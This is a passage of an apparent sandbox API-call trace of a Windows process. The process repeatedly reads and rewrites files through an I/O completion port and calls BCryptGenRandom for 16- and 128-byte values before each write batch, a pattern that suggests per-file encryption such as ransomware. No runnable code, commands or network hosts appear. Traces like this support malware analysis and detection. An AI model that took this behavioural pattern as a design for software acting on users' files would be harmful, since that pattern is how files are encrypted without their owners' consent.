(_Block=0x1fa90b8) [0161.971] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.973] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.985] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4f6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.985] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.986] CloseHandle (hObject=0x2a4) returned 1 [0161.986] free (_Block=0x3df0008) [0161.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.998] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.998] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.998] free (_Block=0x3e305b8) [0161.998] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.998] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.998] free (_Block=0x1fa91d0) [0161.998] free (_Block=0x1fa2ed8) [0161.998] free (_Block=0x1fa90b8) [0161.998] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.999] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.011] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x938, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.011] CloseHandle (hObject=0x2a4) returned 1 [0162.012] free (_Block=0x3df0008) [0162.012] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.021] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.022] free (_Block=0x3e305b8) [0162.022] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.022] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.022] free (_Block=0x1fa91d0) [0162.022] free (_Block=0x1fa2ed8) [0162.022] free (_Block=0x1fa90b8) [0162.022] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.023] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.035] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6efa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.049] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5880, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.065] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x477c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.080] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.080] CloseHandle (hObject=0x2a4) returned 1 [0162.080] free (_Block=0x3df0008) [0162.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.145] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.145] free (_Block=0x3e305b8) [0162.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.145] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.145] free (_Block=0x1fa91d0) [0162.145] free (_Block=0x1fa2ed8) [0162.146] free (_Block=0x1fa90b8) [0162.146] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.147] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7d20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.170] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x64c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.183] CloseHandle (hObject=0x2a4) returned 1 [0162.184] free (_Block=0x3df0008) [0162.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.196] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7658, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.211] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x23f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.230] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.267] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.271] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x514, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.272] CloseHandle (hObject=0x308) returned 1 [0162.272] free (_Block=0x1ff1e60) [0162.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.297] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.297] free (_Block=0x3e305b8) [0162.297] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.297] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.298] free (_Block=0x1fa91d0) [0162.298] free (_Block=0x1fa2ed8) [0162.298] free (_Block=0x1fa90b8) [0162.298] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.309] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.310] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.310] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.310] free (_Block=0x3e305b8) [0162.310] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.310] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.310] free (_Block=0x1fa91d0) [0162.311] free (_Block=0x1fa2ed8) [0162.311] free (_Block=0x1fa90b8) [0162.311] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.322] CloseHandle (hObject=0x338) returned 1 [0162.322] free (_Block=0x3e70008) [0162.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.332] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3210, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.350] CloseHandle (hObject=0x3cc) returned 1 [0162.351] free (_Block=0x1ff1e60) [0162.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.364] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0162.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.379] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1a7e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0162.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.406] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xb70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0162.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.421] CloseHandle (hObject=0x2a8) returned 1 [0162.421] free (_Block=0x3e70008) [0162.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.422] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.516] CloseHandle (hObject=0x338) returned 1 [0162.516] free (_Block=0x3f70048) [0162.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.528] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.528] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.528] free (_Block=0x3e305b8) [0162.528] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.528] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.529] free (_Block=0x1fa91d0) [0162.529] free (_Block=0x1fa2ed8) [0162.529] free (_Block=0x1fa90b8) [0162.529] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.541] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.541] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.541] free (_Block=0x3e305b8) [0162.541] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.541] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.541] free (_Block=0x1fa91d0) [0162.541] free (_Block=0x1fa2ed8) [0162.541] free (_Block=0x1fa90b8) [0162.541] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, 